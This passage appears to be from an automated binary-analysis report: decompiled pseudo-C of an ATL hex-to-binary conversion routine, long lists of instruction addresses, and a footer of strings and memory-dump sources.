									__eax = E00D3DF80(__ebx,  &_v2656, __eflags, _v2668);
									_v8 = 0xf;
									__ecx =  &_v2656;
									__eax = E00D3DFC0( &_v2656);
									__eflags = __eax;
									if(__eax != 0) {
										__ecx =  &_v2656;
										_v1620 = E00D3DFC0( &_v2656);
										__edx = _v2668;
										_v1620 = E00D4AF80(__edi, _v1620, 0, _v2668);
										_v2680 = 0;
										while(1) {
											__edx = _v2680;
											__eflags = _v2680 - _v2676;
											if(_v2680 >= _v2676) {
												goto L177;
											}
											_v2680 = _v2680 & 0x00000001;
											1 = 1 - (_v2680 & 0x00000001);
											__esi = 1 - (_v2680 & 0x00000001) << 2;
											_v1596 = _v1596 + _v2680;
											__edx =  *(_v1596 + _v2680) & 0x000000ff;
											__ecx = _v28;
											__eax = E00D37FE0(__ebx, _v28, __edi, __esi,  *(_v1596 + _v2680) & 0x000000ff);
											__edi = __al & 0x000000ff;
											__ecx = 1;
											__edi = (__al & 0x000000ff) << __cl;
											__eax = _v2680;
											asm("cdq");
											_v2680 - __edx = _v2680 - __edx >> 1;
											_v1620 =  *(_v1620 + (_v2680 - __edx >> 1)) & 0x000000ff;
											__ecx =  *(_v1620 + (_v2680 - __edx >> 1)) & 0x000000ff | __edi;
											__eax = _v2680;
											asm("cdq");
											__eax = _v2680 - __edx;
											__eax = _v2680 - __edx >> 1;
											__edx = _v1620;
											 *(_v1620 + __eax) = __cl;
											__ecx = _v2680;
											__ecx = _v2680 + 1;
											__eflags = __ecx;
											_v2680 = __ecx;
										}
										goto L177;
									} else {
										_v2800 = 0x8007000e;
										_v8 = 0xe;
										__ecx =  &_v2656;
										__eax = E00D3DFD0( &_v2656);
										_v8 = 0xd;
										__ecx =  &_v1584;
										__eax = E00D41F30( &_v1584, __eflags);
										_v8 = 1;
										__ecx =  &_v1564;
										__eax = E00D41F30( &_v1564, __eflags);
										_v8 = 0;
										__ecx =  &_v124;
										__eax = E00D3F220( &_v124);
										_v8 = 0xffffffff;
										__ecx =  &_v44;
										E00D34220(__ecx, __eflags) = _v2800;
										goto L206;
									}
								} else {
									_push("Binary Data does not fall on BYTE boundries\n");
									_push(0);
									__ecx = 0xf237ac;
									_push(E00D3F1F0(0xf237ac));
									__ecx =  &_v2792;
									_push(E00D323B0( &_v2792, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlplus.h", 0x2f3));
									__eax = E00D323E0(__ebx, __edi, __esi, __eflags);
									__esp = __esp + 0x10;
									_v2796 = 0x80004005;
									_v8 = 0xe;
									__ecx =  &_v2656;
									__eax = E00D3DFD0( &_v2656);
									_v8 = 0xd;
									__ecx =  &_v1584;
									__eax = E00D41F30( &_v1584, __eflags);
									_v8 = 1;
									__ecx =  &_v1564;
									__eax = E00D41F30( &_v1564, __eflags);
									_v8 = 0;
									__ecx =  &_v124;
									__eax = E00D3F220( &_v124);
									_v8 = 0xffffffff;
									__ecx =  &_v44;
									E00D34220(__ecx, __eflags) = _v2796;
									L206:
									_push(_t805);
									_push(_t769);
									E00DC14C0(_t817, 0xd39db8);
									_pop(_t771);
									_pop(_t810);
									 *[fs:0x0] = _v16;
									_pop(_t814);
									_pop(_t816);
									_pop(_t779);
									return E00DC1520(E00D47280(_t771, _t779, _v24 ^ _t817, _t810, _t814, _t816), _t817 - _t820 + 0xb58);
								}
							}
					}
				}
				_t807 =  &(( *_a8)[1]);
				__eflags = _t807;
				 *_a8 = _t807;
				_t805 =  *_a8;
				E00D3A0F0(_v28,  *_t805,  &_v72,  &_v84,  &_v96);
				_v2816 = _v56;
				_v8 = 0;
				E00D3F220( &_v124);
				_v8 = 0xffffffff;
				E00D34220( &_v44, __eflags);
				_t769 = _v2816;
				goto L206;
			}

























































































































                      0x00d386d3
                      0x00d386d5
                      0x00d386e0
                      0x00d386fc
                      0x00d386fc
                      0x00d386fe
                      0x00d386ff
                      0x00d38704
                      0x00d38706
                      0x00d38709
                      0x00d3870d
                      0x00d38713
                      0x00d38716
                      0x00d3871e
                      0x00d38723
                      0x00d3872a
                      0x00d38731
                      0x00d38738
                      0x00d3873c
                      0x00d38743
                      0x00d3874f
                      0x00d38752
                      0x00d38759
                      0x00d38763
                      0x00d38768
                      0x00d3877d
                      0x00d38783
                      0x00d38788
                      0x00d38795
                      0x00d387a2
                      0x00d39cf7
                      0x00d39cf7
                      0x00d39cf9
                      0x00d39d13
                      0x00d39d18
                      0x00d39d1b
                      0x00d39d1e
                      0x00d39d20
                      0x00d39d20
                      0x00d39d1e
                      0x00d39d21
                      0x00000000
                      0x00d39d21
                      0x00d387ae
                      0x00000000
                      0x00d387b5
                      0x00d387bf
                      0x00d387c6
                      0x00d387cb
                      0x00d387d5
                      0x00d387da
                      0x00000000
                      0x00000000
                      0x00d387e5
                      0x00d387e9
                      0x00d387ed
                      0x00d3883f
                      0x00d3883f
                      0x00d38844
                      0x00d38847
                      0x00d3884a
                      0x00d3884c
                      0x00d38850
                      0x00d38854
                      0x00d38858
                      0x00d3885b
                      0x00d3885d
                      0x00d38860
                      0x00d38863
                      0x00000000
                      0x00d38863
                      0x00d387ef
                      0x00d387f3
                      0x00d387f7
                      0x00d387fb
                      0x00d387ff
                      0x00d38807
                      0x00d3880a
                      0x00d3880e
                      0x00000000
                      0x00d38810
                      0x00d38810
                      0x00d38813
                      0x00d38819
                      0x00d3881d
                      0x00d38820
                      0x00d38825
                      0x00d3882c
                      0x00d38834
                      0x00000000
                      0x00d38834
                      0x00000000
                      0x00d3886d
                      0x00d38871
                      0x00000000
                      0x00000000
                      0x00d38873
                      0x00d38877
                      0x00d3887b
                      0x00d3887f
                      0x00d38887
                      0x00d3888a
                      0x00d3888e
                      0x00000000
                      0x00000000
                      0x00d38890
                      0x00d38893
                      0x00d38899
                      0x00d3889d
                      0x00d388a0
                      0x00d388a5
                      0x00d388ac
                      0x00d388b4
                      0x00000000
                      0x00000000
                      0x00d388bf
                      0x00d388bf
                      0x00d388c3
                      0x00d389f0
                      0x00d389f4
                      0x00d389f8
                      0x00d389fc
                      0x00d38a00
                      0x00d38a08
                      0x00d38a0b
                      0x00d38a0f
                      0x00d38a40
                      0x00d38a40
                      0x00d38a45
                      0x00d38a48
                      0x00d38a4b
                      0x00d38a4d
                      0x00d38a51
                      0x00d38a55
                      0x00d38a59
                      0x00d38a5c
                      0x00d38a5e
                      0x00d38a61
                      0x00d38a64
                      0x00000000
                      0x00d38a64
                      0x00d38a11
                      0x00d38a14
                      0x00d38a1a
                      0x00d38a1e
                      0x00d38a21
                      0x00d38a26
                      0x00d38a2d
                      0x00d38a35
                      0x00000000
                      0x00d38a35
                      0x00d388c9
                      0x00d388d3
                      0x00d388d9
                      0x00d388de
                      0x00d388e5
                      0x00d388ec
                      0x00d388f0
                      0x00d388f4
                      0x00d388fc
                      0x00d388ff
                      0x00d38903
                      0x00d3893f
                      0x00d38946
                      0x00d3894a
                      0x00d3894c
                      0x00d38953
                      0x00d38963
                      0x00d38969
                      0x00d38955
                      0x00d38955
                      0x00d3895b
                      0x00d3895b
                      0x00d38974
                      0x00d3897b
                      0x00d3897f
                      0x00d38987
                      0x00d38987
                      0x00d3898a
                      0x00d3898e
                      0x00d389d9
                      0x00d389d9
                      0x00d389dc
                      0x00d389de
                      0x00d389e0
                      0x00d389e3
                      0x00d389e9
                      0x00000000
                      0x00d38990
                      0x00d38990
                      0x00d38994
                      0x00000000
                      0x00000000
                      0x00d38996
                      0x00d389a2
                      0x00d389a8
                      0x00d389ae
                      0x00d389b3
                      0x00d389b7
                      0x00d389ba
                      0x00d389bf
                      0x00d389c6
                      0x00d389ce
                      0x00000000
                      0x00d389ce
                      0x00d3898e
                      0x00d38905
                      0x00d38908
                      0x00d3890e
                      0x00d38914
                      0x00d38919
                      0x00d3891d
                      0x00d38920
                      0x00d38925
                      0x00d3892c
                      0x00d38934
                      0x00000000
                      0x00000000
                      0x00d38a6e
                      0x00d38a6e
                      0x00d38a70
                      0x00d38a8a
                      0x00d38a92
                      0x00d38a95
                      0x00d38a97
                      0x00d38a97
                      0x00d38a95
                      0x00000000
                      0x00000000
                      0x00d38a9d
                      0x00d38aa2
                      0x00d38aa5
                      0x00d38aa8
                      0x00d38aaa
                      0x00d38aae
                      0x00d38ab2
                      0x00d38ab6
                      0x00d38aba
                      0x00d38abe
                      0x00d38ac2
                      0x00d38aca
                      0x00d38acd
                      0x00d38ad1
                      0x00d38b02
                      0x00d38b06
                      0x00d38b0a
                      0x00d38b0e
                      0x00d38b11
                      0x00d38b13
                      0x00d38b16
                      0x00d38b19
                      0x00d38b1e
                      0x00d38b22
                      0x00d38ba2
                      0x00000000
                      0x00d38ba2
                      0x00d38b24
                      0x00d38b28
                      0x00d38b2a
                      0x00d38b9e
                      0x00000000
                      0x00d38b9e
                      0x00d38b2c
                      0x00d38b33
                      0x00d38b3a
                      0x00d38b41
                      0x00d38b45
                      0x00d38b48
                      0x00d38b4d
                      0x00d38b51
                      0x00d38b58
                      0x00d38b5c
                      0x00d38b64
                      0x00d38b67
                      0x00d38b6b
                      0x00000000
                      0x00d38b9c
                      0x00d38b6d
                      0x00d38b70
                      0x00d38b76
                      0x00d38b7a
                      0x00d38b7d
                      0x00d38b82
                      0x00d38b89
                      0x00d38b91
                      0x00000000
                      0x00d38b91
                      0x00d38ad3
                      0x00d38ad6
                      0x00d38adc
                      0x00d38ae0
                      0x00d38ae3
                      0x00d38ae8
                      0x00d38aef
                      0x00d38af7
                      0x00000000
                      0x00000000
                      0x00d38ba7
                      0x00d38ba7
                      0x00d38ba9
                      0x00d38bc3
                      0x00d38bcb
                      0x00d38bce
                      0x00d38bd0
                      0x00d38bd0
                      0x00d38bce
                      0x00d38bd1
                      0x00d38bdb
                      0x00d38bdf
                      0x00d38be2
                      0x00d38be7
                      0x00d38bee
                      0x00d38bf6
                      0x00000000
                      0x00000000
                      0x00d38c04
                      0x00d38c0a
                      0x00d38c10
                      0x00d38c15
                      0x00d38c18
                      0x00d38c1b
                      0x00d38c1d
                      0x00d38c21
                      0x00d38c25
                      0x00d38c29
                      0x00d38c2d
                      0x00d38c31
                      0x00d38c38
                      0x00d38c40
                      0x00d38c46
                      0x00d38c4a
                      0x00d38c4d
                      0x00d38c52
                      0x00d38c59
                      0x00d38c61
                      0x00000000
                      0x00000000
                      0x00d38c71
                      0x00d38c75
                      0x00d38f18
                      0x00d38f18
                      0x00d38f1d
                      0x00d38f20
                      0x00d38f23
                      0x00d38f25
                      0x00d38f29
                      0x00d38f2d
                      0x00d38f31
                      0x00d38f34
                      0x00d38f36
                      0x00d38f39
                      0x00d38f3c
                      0x00000000
                      0x00d38f3c
                      0x00d38c7b
                      0x00d38c82
                      0x00d38c86
                      0x00d38c88
                      0x00d38c8b
                      0x00d38c8e
                      0x00d38c8e
                      0x00d38c95
                      0x00d38c9b
                      0x00d38ca0
                      0x00d38ca4
                      0x00d38caa
                      0x00d38caf
                      0x00d38cb3
                      0x00d38cbd
                      0x00d38cc7
                      0x00d38cce
                      0x00d38cd5
                      0x00d38cd9
                      0x00d38cdd
                      0x00d38ce5
                      0x00d38ce8
                      0x00d38cec
                      0x00d38cee
                      0x00d38cf2
                      0x00d38cf4
                      0x00d38cfb
                      0x00d38d02
                      0x00d38d06
                      0x00d38d0a
                      0x00d38d12
                      0x00d38d12
                      0x00d38cf2
                      0x00d38d17
                      0x00d38d1d
                      0x00d38d22
                      0x00d38d26
                      0x00d38d2a
                      0x00d38d37
                      0x00d38d3a
                      0x00d38d2c
                      0x00d38d2c
                      0x00d38d2f
                      0x00d38d2f
                      0x00d38d40
                      0x00d38d47
                      0x00d38d57
                      0x00d38d5d
                      0x00d38d49
                      0x00d38d49
                      0x00d38d4f
                      0x00d38d4f
                      0x00d38d63
                      0x00d38d67
                      0x00d38d9a
                      0x00d38d69
                      0x00d38d69
                      0x00d38d70
                      0x00d38d80
                      0x00d38d86
                      0x00d38d72
                      0x00d38d72
                      0x00d38d78
                      0x00d38d78
                      0x00d38d8c
                      0x00d38d92
                      0x00d38d92
                      0x00d38da6
                      0x00d38dad
                      0x00d38db4
                      0x00d38dbf
                      0x00d38dc2
                      0x00d38dcc
                      0x00d38dd0
                      0x00d38e37
                      0x00d38e3e
                      0x00d38e40
                      0x00d38e42
                      0x00d38e42
                      0x00d38e49
                      0x00d38e4d
                      0x00d38e80
                      0x00d38e4f
                      0x00d38e4f
                      0x00d38e56
                      0x00d38e66
                      0x00d38e6c
                      0x00d38e58
                      0x00d38e58
                      0x00d38e5e
                      0x00d38e5e
                      0x00d38e72
                      0x00d38e78
                      0x00d38e78
                      0x00d38e8a
                      0x00d38e91
                      0x00d38ea1
                      0x00d38ea7
                      0x00d38e93
                      0x00d38e93
                      0x00d38e99
                      0x00d38e99
                      0x00d38ead
                      0x00d38eb3
                      0x00d38eb4
                      0x00d38ec2
                      0x00d38ec7
                      0x00d38ed7
                      0x00d38ee3
                      0x00d38eeb
                      0x00d38eef
                      0x00d38ef5
                      0x00d38efa
                      0x00d38efe
                      0x00d38f04
                      0x00d38f09
                      0x00d38f0d
                      0x00d38f13
                      0x00000000
                      0x00d38dd2
                      0x00d38dd2
                      0x00d38dde
                      0x00d38de4
                      0x00d38de8
                      0x00d38dee
                      0x00d38df3
                      0x00d38df7
                      0x00d38dfd
                      0x00d38e02
                      0x00d38e06
                      0x00d38e0c
                      0x00d38e11
                      0x00d38e15
                      0x00d38e18
                      0x00d38e1d
                      0x00d38e24
                      0x00d38e2c
                      0x00000000
                      0x00d38e2c
                      0x00000000
                      0x00d38f46
                      0x00d38f4a
                      0x00d3943b
                      0x00d3943b
                      0x00d39440
                      0x00d39443
                      0x00d39446
                      0x00d39448
                      0x00d3944c
                      0x00d39450
                      0x00d39454
                      0x00d39457
                      0x00d39459
                      0x00d3945c
                      0x00d3945f
                      0x00000000
                      0x00d3945f
                      0x00d38f50
                      0x00d38f57
                      0x00d38f5b
                      0x00d38f5d
                      0x00d38f60
                      0x00d38f63
                      0x00d38f63
                      0x00d38f6a
                      0x00d38f70
                      0x00d38f75
                      0x00d38f79
                      0x00d38f7f
                      0x00d38f84
                      0x00d38f88
                      0x00d38f92
                      0x00d38f9c
                      0x00d38fa3
                      0x00d38faa
                      0x00d38fae
                      0x00d38fb2
                      0x00d38fba
                      0x00d38fbd
                      0x00d38fc1
                      0x00d38fc3
                      0x00d38fc7
                      0x00d38fc9
                      0x00d38fd0
                      0x00d38fd7
                      0x00d38fdb
                      0x00d38fdf
                      0x00d38fe7
                      0x00d38fe7
                      0x00d38fc7
                      0x00d38fea
                      0x00d38fee
                      0x00d39021
                      0x00d38ff0
                      0x00d38ff0
                      0x00d38ff7
                      0x00d39007
                      0x00d3900d
                      0x00d38ff9
                      0x00d38ff9
                      0x00d38fff
                      0x00d38fff
                      0x00d39013
                      0x00d39019
                      0x00d39019
                      0x00d3902b
                      0x00d39032
                      0x00d39042
                      0x00d39048
                      0x00d39034
                      0x00d39034
                      0x00d3903a
                      0x00d3903a
                      0x00d3904e
                      0x00d39054
                      0x00d39055
                      0x00d39063
                      0x00d39068
                      0x00d39078
                      0x00d39084
                      0x00d3908c
                      0x00d39093
                      0x00d390a3
                      0x00d390a9
                      0x00d39095
                      0x00d39095
                      0x00d3909b
                      0x00d3909b
                      0x00d390af
                      0x00d390b5
                      0x00d390bb
                      0x00d390c2
                      0x00d390cd
                      0x00d390d3
                      0x00d390d9
                      0x00d390de
                      0x00d390e2
                      0x00d390e6
                      0x00d390ed
                      0x00d390f3
                      0x00d39100
                      0x00d39110
                      0x00d39116
                      0x00d3911b
                      0x00d3911d
                      0x00d393b1
                      0x00d393bb
                      0x00d393bf
                      0x00d393c5
                      0x00d393ca
                      0x00d393ce
                      0x00d393d4
                      0x00d393d9
                      0x00d393dd
                      0x00d393e3
                      0x00d393e8
                      0x00d393ec
                      0x00d393ef
                      0x00d393f4
                      0x00d393fb
                      0x00d39403
                      0x00000000
                      0x00d39123
                      0x00d39123
                      0x00d3912e
                      0x00d39134
                      0x00d3913a
                      0x00d39140
                      0x00d3914a
                      0x00d3914a
                      0x00d39150
                      0x00d39153
                      0x00d39155
                      0x00000000
                      0x00000000
                      0x00d3915b
                      0x00d3915d
                      0x00d39164
                      0x00d3916a
                      0x00d39171
                      0x00d39177
                      0x00d3917d
                      0x00d39180
                      0x00d39183
                      0x00d391cc
                      0x00d391cc
                      0x00d391d2
                      0x00d391d8
                      0x00d391da
                      0x00d391dc
                      0x00d391de
                      0x00d391e4
                      0x00d391e8
                      0x00d391ee
                      0x00d391f0
                      0x00d391f5
                      0x00d391f7
                      0x00d39236
                      0x00d3923c
                      0x00d3923f
                      0x00d39245
                      0x00d3924b
                      0x00d3924b
                      0x00d3924e
                      0x00d39254
                      0x00d3925a
                      0x00d3925d
                      0x00000000
                      0x00d3925d
                      0x00d391ff
                      0x00d39202
                      0x00d3920e
                      0x00d39211
                      0x00d39217
                      0x00d3921d
                      0x00d39220
                      0x00d39222
                      0x00d39226
                      0x00d3922c
                      0x00d39232
                      0x00d39234
                      0x00000000
                      0x00d39234
                      0x00000000
                      0x00d39224
                      0x00d39185
                      0x00d3918b
                      0x00d3918e
                      0x00d39191
                      0x00000000
                      0x00000000
                      0x00d39193
                      0x00d39199
                      0x00d391a2
                      0x00d391a5
                      0x00d391ab
                      0x00d391ad
                      0x00d391b4
                      0x00d391ba
                      0x00d391c1
                      0x00000000
                      0x00d391c1
                      0x00d39268
                      0x00d3926e
                      0x00d39277
                      0x00d3927a
                      0x00d39280
                      0x00d39286
                      0x00d3928b
                      0x00d39291
                      0x00d39296
                      0x00d3929a
                      0x00d392a7
                      0x00d392aa
                      0x00d3929c
                      0x00d3929c
                      0x00d3929f
                      0x00d3929f
                      0x00d392b0
                      0x00d392b4
                      0x00d392e7
                      0x00d392b6
                      0x00d392b6
                      0x00d392bd
                      0x00d392cd
                      0x00d392d3
                      0x00d392bf
                      0x00d392bf
                      0x00d392c5
                      0x00d392c5
                      0x00d392d9
                      0x00d392df
                      0x00d392df
                      0x00d392f1
                      0x00d392fd
                      0x00d39304
                      0x00d3930f
                      0x00d39312
                      0x00d3931c
                      0x00d39320
                      0x00d39392
                      0x00d39399
                      0x00d3939b
                      0x00d3939d
                      0x00d3939d
                      0x00d393a4
                      0x00d393aa
                      0x00d3940e
                      0x00d39412
                      0x00d39418
                      0x00d3941d
                      0x00d39421
                      0x00d39427
                      0x00d3942c
                      0x00d39430
                      0x00d39436
                      0x00000000
                      0x00d39322
                      0x00d39322
                      0x00d3932e
                      0x00d39334
                      0x00d3933a
                      0x00d3933f
                      0x00d39343
                      0x00d39349
                      0x00d3934e
                      0x00d39352
                      0x00d39358
                      0x00d3935d
                      0x00d39361
                      0x00d39367
                      0x00d3936c
                      0x00d39370
                      0x00d39373
                      0x00d39378
                      0x00d3937f
                      0x00d39387
                      0x00000000
                      0x00d39387
                      0x00d39320
                      0x00000000
                      0x00d39469
                      0x00d3946d
                      0x00d397b9
                      0x00d397b9
                      0x00d397be
                      0x00d397c1
                      0x00d397c4
                      0x00d397c6
                      0x00d397ca
                      0x00d397ce
                      0x00d397d2
                      0x00d397d5
                      0x00d397d7
                      0x00d397da
                      0x00d397dd
                      0x00000000
                      0x00d397dd
                      0x00d39473
                      0x00d3947a
                      0x00d3947e
                      0x00d39480
                      0x00d39483
                      0x00d39486
                      0x00d39486
                      0x00d3948d
                      0x00d39493
                      0x00d39498
                      0x00d3949c
                      0x00d394a2
                      0x00d394a7
                      0x00d394ab
                      0x00d394b5
                      0x00d394bf
                      0x00d394c6
                      0x00d394ca
                      0x00d394ce
                      0x00d394d6
                      0x00d394d9
                      0x00d394dd
                      0x00d395cc
                      0x00d395cc
                      0x00d395d0
                      0x00d395d2
                      0x00d395d6
                      0x00d395d8
                      0x00d395df
                      0x00d395e6
                      0x00d395ea
                      0x00d395ee
                      0x00d395f6
                      0x00d395f6
                      0x00d395d6
                      0x00d395fb
                      0x00d39601
                      0x00d39606
                      0x00d3960a
                      0x00d3960e
                      0x00d3961b
                      0x00d3961e
                      0x00d39610
                      0x00d39610
                      0x00d39613
                      0x00d39613
                      0x00d39624
                      0x00d3962b
                      0x00d3963b
                      0x00d39641
                      0x00d3962d
                      0x00d3962d
                      0x00d39633
                      0x00d39633
                      0x00d39647
                      0x00d3964e
                      0x00d39655
                      0x00d39660
                      0x00d39663
                      0x00d3966d
                      0x00d39671
                      0x00d396d8
                      0x00d396df
                      0x00d396e1
                      0x00d396e3
                      0x00d396e3
                      0x00d396ea
                      0x00d396ee
                      0x00d39721
                      0x00d396f0
                      0x00d396f0
                      0x00d396f7
                      0x00d39707
                      0x00d3970d
                      0x00d396f9
                      0x00d396f9
                      0x00d396ff
                      0x00d396ff
                      0x00d39713
                      0x00d39719
                      0x00d39719
                      0x00d3972b
                      0x00d39732
                      0x00d39742
                      0x00d39748
                      0x00d39734
                      0x00d39734
                      0x00d3973a
                      0x00d3973a
                      0x00d3974e
                      0x00d39754
                      0x00d39755
                      0x00d39763
                      0x00d39768
                      0x00d39778
                      0x00d39784
                      0x00d3978c
                      0x00d39790
                      0x00d39796
                      0x00d3979b
                      0x00d3979f
                      0x00d397a5
                      0x00d397aa
                      0x00d397ae
                      0x00d397b4
                      0x00000000
                      0x00d39673
                      0x00d39673
                      0x00d3967f
                      0x00d39685
                      0x00d39689
                      0x00d3968f
                      0x00d39694
                      0x00d39698
                      0x00d3969e
                      0x00d396a3
                      0x00d396a7
                      0x00d396ad
                      0x00d396b2
                      0x00d396b6
                      0x00d396b9
                      0x00d396be
                      0x00d396c5
                      0x00d396cd
                      0x00000000
                      0x00d396cd
                      0x00d394e3
                      0x00d394e3
                      0x00d394ea
                      0x00d394f1
                      0x00d394f8
                      0x00d394fc
                      0x00d394ff
                      0x00d39504
                      0x00d3950b
                      0x00d3951b
                      0x00d39521
                      0x00d3950d
                      0x00d3950d
                      0x00d39513
                      0x00d39513
                      0x00d39527
                      0x00d3952e
                      0x00d39534
                      0x00d39539
                      0x00d3953b
                      0x00d39541
                      0x00d39542
                      0x00d39544
                      0x00d39546
                      0x00d3954c
                      0x00d39551
                      0x00d39552
                      0x00d39558
                      0x00d3955f
                      0x00d39562
                      0x00d39566
                      0x00d395c1
                      0x00d395c7
                      0x00000000
                      0x00d39568
                      0x00d39568
                      0x00d39572
                      0x00d39578
                      0x00d3957d
                      0x00d39581
                      0x00d39587
                      0x00d3958c
                      0x00d39590
                      0x00d39596
                      0x00d3959b
                      0x00d3959f
                      0x00d395a2
                      0x00d395a7
                      0x00d395ae
                      0x00d395b6
                      0x00000000
                      0x00d395b6
                      0x00d39566
                      0x00000000
                      0x00d397e7
                      0x00d397eb
                      0x00d39ccc
                      0x00d39ccc
                      0x00d39cd1
                      0x00d39cd4
                      0x00d39cd7
                      0x00d39cd9
                      0x00d39cdd
                      0x00d39ce1
                      0x00d39ce5
                      0x00d39ce8
                      0x00d39cea
                      0x00d39ced
                      0x00d39cf0
                      0x00000000
                      0x00d39cf0
                      0x00d397f1
                      0x00d397f8
                      0x00d397fc
                      0x00d397fe
                      0x00d39801
                      0x00d39804
                      0x00d39804
                      0x00d3980b
                      0x00d39811
                      0x00d39816
                      0x00d3981a
                      0x00d39820
                      0x00d39825
                      0x00d39829
                      0x00d39833
                      0x00d3983d
                      0x00d39843
                      0x00d39848
                      0x00d3984c
                      0x00d39853
                      0x00d3985a
                      0x00d3985e
                      0x00d39862
                      0x00d3986a
                      0x00d3986d
                      0x00d39871
                      0x00d39aba
                      0x00d39aba
                      0x00d39abe
                      0x00d39ac0
                      0x00d39ac4
                      0x00d39ac6
                      0x00d39acd
                      0x00d39ad4
                      0x00d39ad8
                      0x00d39adc
                      0x00d39ae4
                      0x00d39ae4
                      0x00d39ac4
                      0x00d39ae9
                      0x00d39aef
                      0x00d39af4
                      0x00d39af8
                      0x00d39afc
                      0x00d39b09
                      0x00d39b0c
                      0x00d39afe
                      0x00d39afe
                      0x00d39b01
                      0x00d39b01
                      0x00d39b12
                      0x00d39b19
                      0x00d39b29
                      0x00d39b2f
                      0x00d39b1b
                      0x00d39b1b
                      0x00d39b21
                      0x00d39b21
                      0x00d39b35
                      0x00d39b3c
                      0x00d39b43
                      0x00d39b4a
                      0x00d39b55
                      0x00d39b58
                      0x00d39b62
                      0x00d39b66
                      0x00d39bdc
                      0x00d39be3
                      0x00d39be5
                      0x00d39be7
                      0x00d39be7
                      0x00d39bee
                      0x00d39bf2
                      0x00d39c25
                      0x00d39bf4
                      0x00d39bf4
                      0x00d39bfb
                      0x00d39c0b
                      0x00d39c11
                      0x00d39bfd
                      0x00d39bfd
                      0x00d39c03
                      0x00d39c03
                      0x00d39c17
                      0x00d39c1d
                      0x00d39c1d
                      0x00d39c2f
                      0x00d39c36
                      0x00d39c46
                      0x00d39c4c
                      0x00d39c38
                      0x00d39c38
                      0x00d39c3e
                      0x00d39c3e
                      0x00d39c52
                      0x00d39c58
                      0x00d39c59
                      0x00d39c67
                      0x00d39c6c
                      0x00d39c7c
                      0x00d39c88
                      0x00d39c90
                      0x00d39c94
                      0x00d39c9a
                      0x00d39c9f
                      0x00d39ca3
                      0x00d39ca9
                      0x00d39cae
                      0x00d39cb2
                      0x00d39cb8
                      0x00d39cbd
                      0x00d39cc1
                      0x00d39cc7
                      0x00000000
                      0x00d39b68
                      0x00d39b68
                      0x00d39b74
                      0x00d39b7a
                      0x00d39b7e
                      0x00d39b84
                      0x00d39b89
                      0x00d39b8d
                      0x00d39b93
                      0x00d39b98
                      0x00d39b9c
                      0x00d39ba2
                      0x00d39ba7
                      0x00d39bab
                      0x00d39bb1
                      0x00d39bb6
                      0x00d39bba
                      0x00d39bbd
                      0x00d39bc2
                      0x00d39bc9
                      0x00d39bd1
                      0x00000000
                      0x00d39bd1
                      0x00d39877
                      0x00d39877
                      0x00d3987e
                      0x00d39885
                      0x00d3988c
                      0x00d39890
                      0x00d39893
                      0x00d39898
                      0x00d3989f
                      0x00d398a1
                      0x00d398a7
                      0x00d398a7
                      0x00d398ad
                      0x00d398bc
                      0x00d398c8
                      0x00d398c8
                      0x00d398cb
                      0x00d3995e
                      0x00d39964
                      0x00d39967
                      0x00d39969
                      0x00d3996f
                      0x00d39973
                      0x00d3997a
                      0x00d39980
                      0x00d3998d
                      0x00d3999d
                      0x00d399a3
                      0x00d399a8
                      0x00d399aa
                      0x00d39a09
                      0x00d39a14
                      0x00d39a1a
                      0x00d39a2a
                      0x00d39a32
                      0x00d39a4d
                      0x00d39a4d
                      0x00d39a53
                      0x00d39a59
                      0x00000000
                      0x00000000
                      0x00d39a61
                      0x00d39a69
                      0x00d39a6b
                      0x00d39a74
                      0x00d39a7a
                      0x00d39a7e
                      0x00d39a81
                      0x00d39a86
                      0x00d39a89
                      0x00d39a8b
                      0x00d39a8d
                      0x00d39a93
                      0x00d39a96
                      0x00d39a9e
                      0x00d39aa2
                      0x00d39aa4
                      0x00d39aaa
                      0x00d39aab
                      0x00d39aad
                      0x00d39aaf
                      0x00d39ab5
                      0x00d39a3e
                      0x00d39a44
                      0x00d39a44
                      0x00d39a47
                      0x00d39a47
                      0x00000000
                      0x00d399ac
                      0x00d399ac
                      0x00d399b6
                      0x00d399ba
                      0x00d399c0
                      0x00d399c5
                      0x00d399c9
                      0x00d399cf
                      0x00d399d4
                      0x00d399d8
                      0x00d399de
                      0x00d399e3
                      0x00d399e7
                      0x00d399ea
                      0x00d399ef
                      0x00d399f6
                      0x00d399fe
                      0x00000000
                      0x00d399fe
                      0x00d398d1
                      0x00d398d1
                      0x00d398d6
                      0x00d398d8
                      0x00d398e2
                      0x00d398ed
                      0x00d398f8
                      0x00d398f9
                      0x00d398fe
                      0x00d39901
                      0x00d3990b
                      0x00d3990f
                      0x00d39915
                      0x00d3991a
                      0x00d3991e
                      0x00d39924
                      0x00d39929
                      0x00d3992d
                      0x00d39933
                      0x00d39938
                      0x00d3993c
                      0x00d3993f
                      0x00d39944
                      0x00d3994b
                      0x00d39953
                      0x00d39d79
                      0x00d39d79
                      0x00d39d7c
                      0x00d39d83
                      0x00d39d88
                      0x00d39d89
                      0x00d39d8d
                      0x00d39d95
                      0x00d39d96
                      0x00d39d97
                      0x00d39db2
                      0x00d39db2
                      0x00d398cb
                      0x00000000
                      0x00d387ae
                      0x00d39d2b
                      0x00d39d2b
                      0x00d39d31
                      0x00d39d42
                      0x00d39d4a
                      0x00d39d52
                      0x00d39d58
                      0x00d39d5f
                      0x00d39d64
                      0x00d39d6e
                      0x00d39d73
                      0x00000000

                      APIs
                      Strings
                      • %ls, xrefs: 00D38A77, 00D39D00
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlplus.h, xrefs: 00D38A83, 00D39D0C
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
